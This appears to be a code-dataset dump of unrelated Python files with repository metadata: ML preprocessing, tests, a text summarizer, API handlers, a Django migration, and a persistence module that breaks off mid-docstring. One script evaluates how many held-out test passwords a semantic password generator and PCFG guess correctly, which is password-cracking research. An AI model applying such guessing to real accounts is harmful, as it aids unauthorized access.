all_embeddings.append(prefix[mask])
captions = [caption for j, caption in enumerate(captions) if is_valid[j]]
image_names = [image_name for j, image_name in enumerate(image_names) if is_valid[j]]
all_captions.extend([{"caption": add_period(caption), "clip_embedding": counter + j, "image_id": image_name}
for j, (caption, image_name) in enumerate(zip(captions, image_names))])
progress.update()
counter += len(captions)
if (i + 1) % 1000 == 0:
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, recover_index)
recover_index = 1 - recover_index
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, 2)
progress.close()
return 0
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--data_root', default='./data/conceptual')
parser.add_argument('--clip_model_type', default="ViT-B/32", choices=('RN50', 'RN101', 'RN50x4', 'ViT-B/32'))
parser.add_argument('--num_threads', type=int, default=1)
args = parser.parse_args()
download_conceptual(args.data_root, args.num_threads, 100)
create_clip_embeddings(args.data_root, args.clip_model_type)
if __name__ == '__main__':
main()
| 37.70082
| 137
| 0.589521
| 1,665
| 0.180998
| 0
| 0
| 697
| 0.075769
| 0
| 0
| 1,040
| 0.113056
|
af7781158a003eb34d7e6424f047ba42deefc00b
| 1,797
|
py
|
Python
|
tests/measure/test_cosine.py
|
icfly2/simstring-1
|
e4a57603967c5d138ce021cedc09d509f75e1933
|
[
"MIT"
] | null | null | null |
tests/measure/test_cosine.py
|
icfly2/simstring-1
|
e4a57603967c5d138ce021cedc09d509f75e1933
|
[
"MIT"
] | null | null | null |
tests/measure/test_cosine.py
|
icfly2/simstring-1
|
e4a57603967c5d138ce021cedc09d509f75e1933
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
from unittest import TestCase
from simstring.measure.cosine import CosineMeasure
class TestCosine(TestCase):
measure = CosineMeasure()
def test_min_feature_size(self):
self.assertEqual(self.measure.min_feature_size(5, 1.0), 5)
self.assertEqual(self.measure.min_feature_size(5, 0.5), 2)
def test_max_feature_size(self):
self.assertEqual(self.measure.max_feature_size(5, 1.0), 5)
self.assertEqual(self.measure.max_feature_size(5, 0.5), 20)
def test_minimum_common_feature_count(self):
self.assertEqual(self.measure.minimum_common_feature_count(5, 5, 1.0), 5)
self.assertEqual(self.measure.minimum_common_feature_count(5, 20, 1.0), 10)
self.assertEqual(self.measure.minimum_common_feature_count(5, 5, 0.5), 3)
def test_similarity(self):
x = ["a", "ab", "bc", "c"]
y = ["a", "ab", "bc", "cd", "e"]
self.assertEqual(round(self.measure.similarity(x, x), 2), 1.0)
self.assertEqual(round(self.measure.similarity(x, y), 2), 0.67)
z = ["a", "ab", "ba", "ab", "a"]
self.assertEqual(round(self.measure.similarity(z, z), 2), 1.0)
self.assertEqual(round(self.measure.similarity(x, z), 2), 0.58)
self.assertEqual(round(self.measure.similarity(x, y), 2), 0.67)
# Test as per paper trigrams with quotes of methyl sulphone and methyl sulfone
a = [' "m', '"me', 'met', 'eth', 'thy', 'hyl', 'yl ', 'l s', ' su', 'sul', 'ulf', 'lfo', 'fon', 'one', 'ne"', 'e" ']
b = [' "m', '"me', 'met', 'eth', 'thy', 'hyl', 'yl ', 'l s', ' su', 'sul', 'ulp', 'lph', 'pho', 'hon', 'one', 'ne"', 'e" ']
self.assertEqual(round(self.measure.similarity(a, b), 3), 0.788) #BUG? Disagrees with paper that claims should be 0.788
| 47.289474
| 131
| 0.613244
| 1,689
| 0.9399
| 0
| 0
| 0
| 0
| 0
| 0
| 369
| 0.205342
|
af77fe8c502d0a33488b3425f1fba0230262d786
| 1,072
|
py
|
Python
|
expansions/config/insc.py
|
croot/blacksmith-2
|
3bb544139a18184a709ca7668f8e69f3ca361475
|
[
"Apache-2.0"
] | null | null | null |
expansions/config/insc.py
|
croot/blacksmith-2
|
3bb544139a18184a709ca7668f8e69f3ca361475
|
[
"Apache-2.0"
] | null | null | null |
expansions/config/insc.py
|
croot/blacksmith-2
|
3bb544139a18184a709ca7668f8e69f3ca361475
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
if DefLANG in ("RU", "UA"):
AnsBase_temp = tuple([line.decode("utf-8") for line in (
"Изменённые пункты: %s", # 0
"Очевидно параметры неверны.", # 1
"Настройки:\n", # 2
"Конфиг пуст.", # 3
"Вниание! Текущий jid сейчас удаляется, сейчас я зайду с нового.", # 4
"смена jid'а", # 5
"Теперь '%s' - мой основной JID.", # 6
"Нельзя! Итак подключен всего один клиент.", # 7
"Система не может выделить ресурсы на ещё один клиент.", # 8
"Не коннектится.", # 9
"Этот jid уже есть в списках.", # 10
"«%s» нет в списке клиентов.", # 11
"«%s» сейчас оффлайн." # 12
)])
else:
AnsBase_temp = (
"Changed options: %s", # 0
"Parameters are incorrect.", # 1
"Config:\n", # 2
"Config is empty.", # 3
"Attention! Current jid deleting now. I'll rejoin with new.", # 4
"jid change", # 5
"'%s' - my main JID now.", # 6
"Forbidden!", # 7
"The system can not allocate resources to another client.", # 8
"No connection.", # 9
"This jid is already in the list.", # 10
"'%s' not in clients-list.", # 11
"'%s' is offline." # 12
)
| 31.529412
| 72
| 0.602612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,115
| 0.827765
|
af78d3f22f044a728a9a4c210c9bf8cdba9f1cf9
| 7,170
|
py
|
Python
|
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
# Global objects
import datetime
import hashlib
import subprocess
import time
import nltk
from Prediction import Summarizer
from data_utils import DataProcessor
PAD_ID = 0
UNK_ID = 1
vocab_dict, word_embedding_array = DataProcessor().prepare_vocab_embeddingdict()
# # print (len(vocab_embed_object.vocab_dict)-2)
model_cpu = Summarizer(vocab_dict, word_embedding_array)
class Preprocess:
def timestamp(self):
return datetime.datetime.fromtimestamp(time.time()).strftime('[%Y-%m-%d %H:%M:%S]')
def Hashhex(self, s):
"""Returns a heximal formated SHA1 hash of the input string.
Args:
s: The string to hash.
Returns:
A heximal formatted hash of the input string.
"""
h = hashlib.sha1()
h.update(s)
return h.hexdigest()
def stanford_processing(self, log, story, highlights):
story_corenlp = None
highlights_corenlp = None
try:
log += self.timestamp() + " Start Stanford Processing (SSegmentation,Tokenization,NERTagging) ...\n"
story_corenlp = subprocess.check_output(['./corenlp.sh', story])
highlights_corenlp = subprocess.check_output(['./corenlp.sh', highlights])
log += self.timestamp() + " Stanford Processing finished.\n"
except Exception as e:
log += self.timestamp() + " Stanford Processing failed.\n" + str(e) + "\n"
return log, story_corenlp, highlights_corenlp
def corenlp_output_parser(self, text):
data_org = []
# data_ner = []
# data_orglower_anonym = []
data_org_vocabid = []
# Parse Stanford Output Data
# sentdata_list = corenlp_output.strip().split("Sentence #")[1:]
for sentdata in nltk.sent_tokenize(text):
line_org = []
# line_ner = []
for word in nltk.word_tokenize(sentdata):
line_org.append(word)
# if token.startswith("NamedEntityTag="):
# if token.startswith("NamedEntityTag=PERSON"):
# line_ner.append("PERSON")
# elif token.startswith("NamedEntityTag=LOCATION"):
# line_ner.append("LOCATION")
# elif token.startswith("NamedEntityTag=ORGANIZATION"):
# line_ner.append("ORGANIZATION")
# elif token.startswith("NamedEntityTag=MISC"):
# line_ner.append("MISC")
# else:
# line_ner.append("O")
data_org.append(line_org)
# data_ner.append(line_ner)
line_org_vocabid = [vocab_dict[word] if word in vocab_dict else UNK_ID
for word in line_org]
data_org_vocabid.append(line_org_vocabid)
return data_org, data_org_vocabid # data_ner, data_orglower_anonym
def stanford_output_modelIn_processing(self, log, story_corenlp, highlights_corenlp):
story_line_org = None
highlights_line_org = None
document_modelIn = None
try:
log += self.timestamp() + " Start model input preparation (StanOutputParsing,OriginalCases,NotAnonymized,VocabIdMap) ...\n"
story_line_org, story_org_vocabid = self.corenlp_output_parser(story_corenlp)
# print story_line_org, story_orglower_anonym_vocabid
highlights_line_org, _ = self.corenlp_output_parser(highlights_corenlp)
# print highlights_line_org
document_modelIn = DataProcessor().prepare_document_modelIn(story_org_vocabid, [], [])
# print document_modelIn
log += self.timestamp() + " Model input preparation finished.\n"
except Exception as e:
log += self.timestamp() + " Model input preparation failed.\n" + str(e) + "\n"
# print story_line_org, highlights_line_org, document_modelIn
# print document_modelIn.shape
return log, story_line_org, highlights_line_org, document_modelIn
def refresh_prediction(self, log, document_modelIn, doclen):
# global model_cpu
# print document_modelIn, doclen
selected_sentids = None
try:
log += self.timestamp() + " Start predicting with Refresh (Best CNN-trained model from Narayan, Cohen and Lapata, 2018) ...\n"
selected_sentids = model_cpu.prediction(document_modelIn, doclen)
log += self.timestamp() + " Refresh prediction finished.\n"
except Exception as e:
log += self.timestamp() + " Refresh prediction failed.\n" + str(e) + "\n"
return log, selected_sentids
def run_textmode(self, text):
'''Text MODE
'''
# Start a log
log = ""
try:
log += self.timestamp() + " Summarizing a text: No side information used.\n"
# No HTML Parsing and Text Extraction Needed
story = text
highlights = ""
# # Start Stanford Parsing for Sentence Segmentation, Tokenization and NER Tagging
# log, story_corenlp, highlights_corenlp = self.stanford_processing(log, story, highlights)
# print(log)
# if (story_corenlp is None) or (highlights_corenlp is None):
# raise Exception
# print story_corenlp, highlights_corenlp
# Stanford Output Parsing and Preparing input to the model
log, story_line_org, highlights_line_org, document_modelIn = self.stanford_output_modelIn_processing(log,
story,
highlights)
print(log)
if (story_line_org is None) or (highlights_line_org is None) or (document_modelIn is None):
raise Exception
# print story_line_org, highlights_line_org, document_modelIn
# print document_modelIn.shape
# SideNet Prediction
log, selected_sentids = self.refresh_prediction(log, document_modelIn, len(story_line_org))
print(log)
if (selected_sentids is None):
raise Exception
selected_sentids.sort()
print(selected_sentids)
# Generate final outputs
log += self.timestamp() + " Producing output summaries. \n"
slead = "\n".join([" ".join(sent) for sent in story_line_org[:3]])
srefresh = "\n".join([" ".join(story_line_org[sidx]) for sidx in selected_sentids])
sgold = "\n".join([" ".join(sent) for sent in highlights_line_org])
# print log
# print slead
# print ssidenet
# print sgold
return log, slead, srefresh, sgold
except Exception as e:
log += self.timestamp() + " Failed.\n" + str(e) + "\n"
print(log)
return log, "", "", ""
| 40.055866
| 138
| 0.58159
| 6,796
| 0.947838
| 0
| 0
| 0
| 0
| 0
| 0
| 2,454
| 0.342259
|
af7b2b1a93e2158eade57c472f0fd8b7130b6ddf
| 69
|
py
|
Python
|
vault/__init__.py
|
globocom/vault
|
4909cc022476e59022a1dc55d1bbabf49873ca80
|
[
"Apache-2.0"
] | 15
|
2015-03-19T13:05:06.000Z
|
2021-08-13T19:17:25.000Z
|
vault/__init__.py
|
globocom/vault
|
4909cc022476e59022a1dc55d1bbabf49873ca80
|
[
"Apache-2.0"
] | 24
|
2015-02-24T14:20:06.000Z
|
2021-12-15T13:33:52.000Z
|
vault/__init__.py
|
globocom/vault
|
4909cc022476e59022a1dc55d1bbabf49873ca80
|
[
"Apache-2.0"
] | 11
|
2016-09-12T07:54:01.000Z
|
2021-10-31T20:26:43.000Z
|
default_app_config = 'vault.apps.VaultConfig'
__version__ = '1.3.7'
| 17.25
| 45
| 0.753623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 31
| 0.449275
|
af7b2d5d99f6baeaacbb0d347417a474259a0efd
| 447
|
py
|
Python
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 62
|
2015-11-19T18:28:56.000Z
|
2021-12-27T02:50:30.000Z
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 33
|
2015-11-23T01:11:33.000Z
|
2021-04-15T04:23:15.000Z
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 28
|
2015-11-24T18:49:33.000Z
|
2021-12-28T16:48:55.000Z
|
import versioneer
from setuptools import setup
setup_args = dict(
name='nbexamples',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license='BSD',
platforms=['Jupyter Notebook'],
packages=[
'nbexamples'
],
include_package_data=True,
install_requires=[
'notebook>=4.2.0',
'nbconvert',
'nbformat'
]
)
if __name__ == '__main__':
setup(**setup_args)
| 19.434783
| 39
| 0.626398
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 95
| 0.212528
|
af7b67f1e4cd5fbb564b9808cb8df8c219c0b7fc
| 702
|
py
|
Python
|
toughradius/manage/api/v1/api_authorize.py
|
geosson/GSRadius
|
5870e3d055e8366f98b8e65220a1520b5da22f6d
|
[
"Apache-2.0"
] | 1
|
2019-05-12T15:06:58.000Z
|
2019-05-12T15:06:58.000Z
|
toughradius/manage/api/v1/api_authorize.py
|
geosson/GSRadius
|
5870e3d055e8366f98b8e65220a1520b5da22f6d
|
[
"Apache-2.0"
] | null | null | null |
toughradius/manage/api/v1/api_authorize.py
|
geosson/GSRadius
|
5870e3d055e8366f98b8e65220a1520b5da22f6d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#coding=utf-8
from toughlib import utils, apiutils
from toughlib.permit import permit
from toughradius.manage.api.apibase import ApiHandler
from toughradius.manage import models
from toughradius.manage.radius.radius_authorize import RadiusAuth
@permit.route(r"/api/v1/authorize")
class AuthorizeHandler(ApiHandler):
def post(self):
try:
req_msg = self.parse_request()
app = self.application
auth = RadiusAuth(app.db_engine,app.mcache,app.aes,req_msg)
self.render_result(**auth.authorize())
except Exception as err:
return self.render_result(code=1,msg=utils.safeunicode(err.message))
| 31.909091
| 80
| 0.702279
| 384
| 0.547009
| 0
| 0
| 420
| 0.598291
| 0
| 0
| 54
| 0.076923
|
af7bf1efb310882137ab2c2a20b32d59f0f8b898
| 89
|
py
|
Python
|
mergics/apps.py
|
nim65s/mergics
|
253b7414d3bcf03078c62b2c58abec8f4b0b9722
|
[
"BSD-2-Clause"
] | null | null | null |
mergics/apps.py
|
nim65s/mergics
|
253b7414d3bcf03078c62b2c58abec8f4b0b9722
|
[
"BSD-2-Clause"
] | 1
|
2020-10-06T20:03:20.000Z
|
2020-10-06T20:27:03.000Z
|
mergics/apps.py
|
nim65s/mergics
|
253b7414d3bcf03078c62b2c58abec8f4b0b9722
|
[
"BSD-2-Clause"
] | null | null | null |
from django.apps import AppConfig
class MergicsConfig(AppConfig):
name = 'mergics'
| 14.833333
| 33
| 0.752809
| 52
| 0.58427
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.101124
|
af7e5e86d0f60de6b492ec7b6eafdc2ebea4c16a
| 6,336
|
py
|
Python
|
project-management-api/app/routers/msprojects.py
|
paolo-demagistris-polito/pm-lab-polito-EnvForDigitalProjectDelivery
|
07e121a6613398bf3a8fbb9ec6831720bfcf2c33
|
[
"MIT"
] | 1
|
2022-03-03T14:22:47.000Z
|
2022-03-03T14:22:47.000Z
|
project-management-api/app/routers/msprojects.py
|
paolo-demagistris-polito/pm-lab-polito-EnvForDigitalProjectDelivery
|
07e121a6613398bf3a8fbb9ec6831720bfcf2c33
|
[
"MIT"
] | 3
|
2022-01-20T05:22:52.000Z
|
2022-01-28T09:34:19.000Z
|
project-management-api/app/routers/msprojects.py
|
pm-lab-polito/EnvForDigitalProjectDelivery
|
0bda402f70160eccb8959ffac3d9baeccce60781
|
[
"MIT"
] | null | null | null |
"""
Module for the methods regarding ms projects
"""
import jpype
import jsonpath_ng.ext
import mpxj
from fastapi import APIRouter, File, UploadFile
from datatypes.models import *
from dependencies import *
router = APIRouter(
prefix="/msprojects",
tags=["msprojects"],
dependencies=[]
)
@router.post("/",
dependencies=[Depends(require_project_permission(Permissions.edit))])
async def add_ms_file_to_project(file: UploadFile = File(...),
user: User = Depends(get_current_active_user),
db_project: Project = Depends(get_project),
session: Session = Depends(get_session)):
"""
Add a ms file to a project
:param request_body: request body
:param file: ms file to upload
:param user: current authenticated user
:param db_project: project to add the file to
:param session: session to use
:return: uploaded ms project
"""
if not file.filename.endswith(".mpp"):
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="File is not a ms project")
file_name = file.filename.split(".")[0]
content = await file.read()
jpype.startJVM()
from net.sf.mpxj.reader import UniversalProjectReader
project = UniversalProjectReader().read(jpype.java.io.ByteArrayInputStream(content))
tasks = []
for task in project.getTasks():
db_task = dict()
db_task["name"] = str(task.getName().toString())
db_task["level"] = task.getOutlineLevel()
db_task["duration"] = str(task.getDuration().toString())
db_task["predecessors"] = list()
db_task["ef"] = str(task.getEarlyFinish().toString())
db_task["es"] = str(task.getEarlyStart().toString())
db_task["lf"] = str(task.getLateFinish().toString())
db_task["ls"] = str(task.getLateStart().toString())
db_task["start"] = str(task.getStart().toString())
db_task["finish"] = str(task.getFinish().toString())
db_task["cost"] = str(task.getCost().toString())
db_task["id"] = str(task.getID().toString())
for rel in task.getPredecessors():
db_pred = dict()
db_pred["target_task"] = str(rel.getTargetTask().getName().toString())
db_pred["target_task_id"] = str(rel.getTargetTask().getID().toString())
db_pred["lag"] = str(rel.getLag().toString())
db_pred["type"] = str(rel.getType().toString())
db_task["predecessors"].append(db_pred)
tasks.append(db_task)
resources = []
for res in project.getResources():
if res.getName() is not None and res.getName() != "":
db_res = dict()
db_res["name"] = str(res.getName().toString())
db_res["id"] = str(res.getID().toString())
resources.append(db_res)
project_properties = project.getProjectProperties()
proj_info = dict()
if project_properties.getStartDate() is not None:
proj_info["baseline_start"] = str(project_properties.getStartDate().toString())
if project_properties.getActualStart() is not None:
proj_info["actual_start"] = str(project_properties.getActualStart().toString())
if project_properties.getFinishDate() is not None:
proj_info["baseline_finish"] = str(project_properties.getFinishDate().toString())
if project_properties.getActualFinish() is not None:
proj_info["actual_finish"] = str(project_properties.getActualFinish().toString())
if project_properties.getBaselineDuration() is not None:
proj_info["baseline_duration"] = str(project_properties.getBaselineDuration().toString())
if project_properties.getActualDuration() is not None:
proj_info["actual_duration"] = str(project_properties.getActualDuration().toString())
if project_properties.getCurrencySymbol() is not None:
proj_info["currency_code"] = str(project_properties.getCurrencyCode().toString())
tmp = crud.get_ms_project(session, db_project.project_name, file_name)
if tmp is not None:
db_msproj = tmp
else:
db_msproj = MSProject(project_name=db_project.project_name,
ms_project_name=file_name,
author_name=user.user_name)
db_msproj.update_author_name = user.user_name
db_msproj.tasks = tasks
db_msproj.resources = resources
db_msproj.proj_info = proj_info
session.add(db_msproj)
session.commit()
session.refresh(db_msproj)
for computed_field in db_msproj.computed_fields_reference:
jsonpath_expr = jsonpath_ng.ext.parse(computed_field.jsonpath)
match computed_field.field_from:
case MSProjectField.tasks:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.tasks)))
case MSProjectField.resources:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.resources)))
case MSProjectField.proj_info:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.proj_info)))
session.add(computed_field)
session.add(db_msproj)
session.commit()
session.refresh(db_msproj)
jpype.shutdownJVM()
return db_msproj
@router.get("/{ms_project_name}",
dependencies=[Depends(require_project_permission(Permissions.view))])
async def get_ms_file_of_project(db_ms_project: MSProject = Depends(get_ms_project)):
"""
Get ms file of a project
:param db_ms_project: ms project from dependencies
:return: ms project if found, 404 otherwise
"""
return db_ms_project
@router.delete("/{ms_project_name}",
dependencies=[Depends(require_project_permission(Permissions.edit))])
async def delete_ms_file_of_project(db_ms_project: MSProject = Depends(get_ms_project),
session: Session = Depends(get_session)):
"""
Delete ms file of a project
:param db_ms_project: ms project from dependencies
:param session: session from dependencies
:return: 200 ok if deleted, 404 if not found
"""
session.delete(db_ms_project)
session.commit()
raise HTTPException(status_code=200, detail="OK")
| 37.94012
| 114
| 0.665404
| 0
| 0
| 0
| 0
| 6,024
| 0.950758
| 5,686
| 0.897412
| 1,029
| 0.162405
|
af7fc4668b2fb86b2672d51501af6b7ccc59aa58
| 1,945
|
py
|
Python
|
evaluation/novel_base_word_comparison.py
|
Knuust/Semantic-Password-Generator
|
d10b8bd3f5871359efae6e046aac76cd22868680
|
[
"BSD-3-Clause"
] | null | null | null |
evaluation/novel_base_word_comparison.py
|
Knuust/Semantic-Password-Generator
|
d10b8bd3f5871359efae6e046aac76cd22868680
|
[
"BSD-3-Clause"
] | null | null | null |
evaluation/novel_base_word_comparison.py
|
Knuust/Semantic-Password-Generator
|
d10b8bd3f5871359efae6e046aac76cd22868680
|
[
"BSD-3-Clause"
] | 1
|
2022-02-23T13:48:34.000Z
|
2022-02-23T13:48:34.000Z
|
import pickle
import matplotlib.pyplot as plt
from matplotlib_venn import venn3
test_list_path = 'final/wörterbücher/'
password_list_path = 'final/generated_password_lists/'
def remove_duplicates(seq):
seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
def load_password_list(file_name):
file = open(file_name + '.txt', "r", encoding='latin1')
password_list = [line.rstrip() for line in file.readlines()]
return password_list
test_set = load_password_list(test_list_path + 'test')
train_words = pickle.load(open('train_words_real.pkl', 'rb'))
test_words = pickle.load(open('test_words_real.pkl', 'rb'))
novel_test_words = set(test_words).difference(train_words)
test_novel_passwords = []
low_test_words = [word.lower() for word in novel_test_words]
for password in test_set:
flag = False
for word in low_test_words:
if word in password.lower():
flag = True
break
if flag:
test_novel_passwords.append(password)
spg_suggestions = load_password_list(password_list_path + 'spg_with_numbers_50M')
pcfg_suggestions = remove_duplicates(load_password_list(password_list_path + 'pcfg_50M'))[:50000000]
methods = {}
methods['spg'] = set(spg_suggestions).intersection(test_novel_passwords)
methods['pcfg'] = set(pcfg_suggestions).intersection(test_novel_passwords)
results = {}
for key in methods.keys():
results[key] = len(methods[key])
print(results)
def find_exclusive_passwords(method):
return len(set(methods[method]).difference(set().union(*[value for key, value in methods.items() if key != method])))
exclusive = {}
for key in methods.keys():
exclusive[key] = find_exclusive_passwords(key)
print(exclusive)
set1 = set(methods['spg'])
set2 = set(methods['pcfg'])
set3 = set(test_novel_passwords)
venn3([set1, set2, set3], ('SeePass', 'PCFG', 'Test'))
plt.savefig('sepass_pcfg_test_venn_real.png')
| 29.029851
| 123
| 0.728021
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 237
| 0.121726
|
af808a47b333d62757233f327d638f9ef66a62b6
| 563
|
py
|
Python
|
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
class Solution:
def distributeCandies(self, candies: int, n: int) -> List[int]:
ans = [0] * n
rows = int((-n + (n**2 + 8 * n**2 * candies)**0.5) / (2 * n**2))
accumN = rows * (rows - 1) * n // 2
for i in range(n):
ans[i] = accumN + rows * (i + 1)
givenCandies = (n**2 * rows**2 + n * rows) // 2
candies -= givenCandies
lastGiven = rows * n
i = 0
while candies > 0:
lastGiven += 1
actualGiven = min(lastGiven, candies)
candies -= actualGiven
ans[i] += actualGiven
i += 1
return ans
| 24.478261
| 68
| 0.515098
| 562
| 0.998224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af814a1fa869942dd97f9544736806c049599941
| 1,810
|
py
|
Python
|
projects/migrations/0086_auto_20201202_0818.py
|
SuviVappula/kaavapino
|
0e3687c94afff10527c9bee9627fc30bd2dfab4f
|
[
"MIT"
] | 3
|
2019-02-07T14:47:00.000Z
|
2022-02-15T14:09:38.000Z
|
projects/migrations/0086_auto_20201202_0818.py
|
SuviVappula/kaavapino
|
0e3687c94afff10527c9bee9627fc30bd2dfab4f
|
[
"MIT"
] | 74
|
2017-12-13T09:18:04.000Z
|
2022-03-11T23:29:59.000Z
|
projects/migrations/0086_auto_20201202_0818.py
|
SuviVappula/kaavapino
|
0e3687c94afff10527c9bee9627fc30bd2dfab4f
|
[
"MIT"
] | 8
|
2017-12-13T09:31:20.000Z
|
2022-02-15T13:10:34.000Z
|
# Generated by Django 2.2.13 on 2020-12-02 06:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('projects', '0085_auto_20201201_1705'),
]
operations = [
migrations.CreateModel(
name='ProjectPhaseDeadlineSectionAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('index', models.PositiveIntegerField(default=0, verbose_name='index')),
('attribute', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='projects.Attribute', verbose_name='attribute')),
],
options={
'verbose_name': 'project phase deadline section item',
'verbose_name_plural': 'project phase deadline section items',
'ordering': ('index',),
},
),
migrations.RemoveField(
model_name='projectphasedeadlinesection',
name='deadlines',
),
migrations.DeleteModel(
name='ProjectPhaseSectionDeadline',
),
migrations.AddField(
model_name='projectphasedeadlinesectionattribute',
name='section',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='projects.ProjectPhaseDeadlineSection', verbose_name='deadline phase section'),
),
migrations.AddField(
model_name='projectphasedeadlinesection',
name='attributes',
field=models.ManyToManyField(related_name='phase_deadline_sections', through='projects.ProjectPhaseDeadlineSectionAttribute', to='projects.Attribute', verbose_name='attributes'),
),
]
| 40.222222
| 190
| 0.633702
| 1,683
| 0.929834
| 0
| 0
| 0
| 0
| 0
| 0
| 635
| 0.350829
|
af815fbf98829714e6eda7b837a98b8d597117ab
| 38,711
|
py
|
Python
|
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
"""
This module provides local and cloud storage of computed values. The main
point of entry is the PersistentCache, which encapsulates this functionality.
"""
import attr
import os
import shutil
import tempfile
import yaml
import warnings
from uuid import uuid4
from pathlib import Path
from bionic.exception import EntitySerializationError, UnsupportedSerializedValueError
from .datatypes import Result
from .gcs import GcsTool
from .utils.files import (
ensure_dir_exists,
ensure_parent_dir_exists,
recursively_copy_path,
)
from .utils.misc import hash_simple_obj_to_hex, oneline
from .utils.urls import (
derelativize_url,
path_from_url,
relativize_url,
url_from_path,
)
from .tokenization import tokenize
import logging
logger = logging.getLogger(__name__)
try:
# The C-based YAML emitter is much faster, but requires separate bindings
# which may not be installed.
YamlDumper = yaml.CDumper
YamlLoader = yaml.CLoader
except AttributeError:
running_under_readthedocs = os.environ.get("READTHEDOCS") == "True"
if not running_under_readthedocs:
warnings.warn(
oneline(
"""
Failed to find LibYAML bindings;
falling back to slower Python implementation.
This may reduce performance on large flows.
Installing LibYAML should resolve this."""
)
)
YamlDumper = yaml.Dumper
YamlLoader = yaml.Loader
class PersistentCache:
"""
Provides a persistent mapping between Queries (things we could compute) and
saved Results (computed Queries). You use it by getting a CacheAccessor
for your specific query, and then performing load/save operations on the
accessor.
When looking up a Query, the cache searches for a saved artifact with a
matching Query. The Query may not match exactly: each Query contains a
Provenance, which represents all the code and data used to compute a value,
and two Provenances can match at different levels of precision, from a
"functional" match to an "exact" one. A functional match is sufficient to
treat two artifacts as interchangeable; the finer levels of matching are
only used by the "assisted versioning" system, which tries to detect
situations where a function's bytecode has changed but its version hasn't.
The cache has two tiers: a "local" tier on disk, which is cheap to access,
and an optional "cloud" tier backed by GCS, which is more expensive to
access (but globally accessible). For load operations, the cache returns
the cheapest artifact that functionally matches the Query. For save
operations, the cache records an exact entry in both tiers.
The cache actually has two distinct responsibilities: (a) translating
between in-memory Python objects and serialized files or blobs, and (b)
maintaining an "inventory" of these files and blobs. Currently it makes
sense to group these responsibilities together at each tier, where the
local inventory tracks the local files and the cloud inventory tracks the
cloud blobs. Each of these tiers is handled by a "store" class. However,
in the future we may have other types of persistent artifacts (like
database tables) which don't have their own inventory type. In this case
we might want to split these responsibilities out.
"""
def __init__(self, local_store, cloud_store):
self._local_store = local_store
self._cloud_store = cloud_store
def get_accessor(self, query):
return CacheAccessor(self, query)
class CacheAccessor:
"""
Provides a reference to the cache entries for a specific query. This
interface is convenient, and it also allows us to maintain some memoized
state for each query, saving redundant lookups.
"""
def __init__(self, parent_cache, query):
self.query = query
self.value_filename_stem = valid_filename_from_query(self.query) + "."
self._local = parent_cache._local_store
self._cloud = parent_cache._cloud_store
# These values are memoized to avoid roundtrips.
self._stored_local_entry = None
self._stored_cloud_entry = None
def flush_stored_entries(self):
"""
Flushes the stored local and cloud cached entries.
"""
self._stored_local_entry = None
self._stored_cloud_entry = None
def can_load(self):
"""
Indicates whether there are any cached artifacts for this query.
"""
try:
return self._get_nearest_entry_with_artifact() is not None
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_provenance(self):
"""
Returns the provenance of the nearest cached artifact for this query,
if one exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
return entry.provenance
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_result(self):
"""
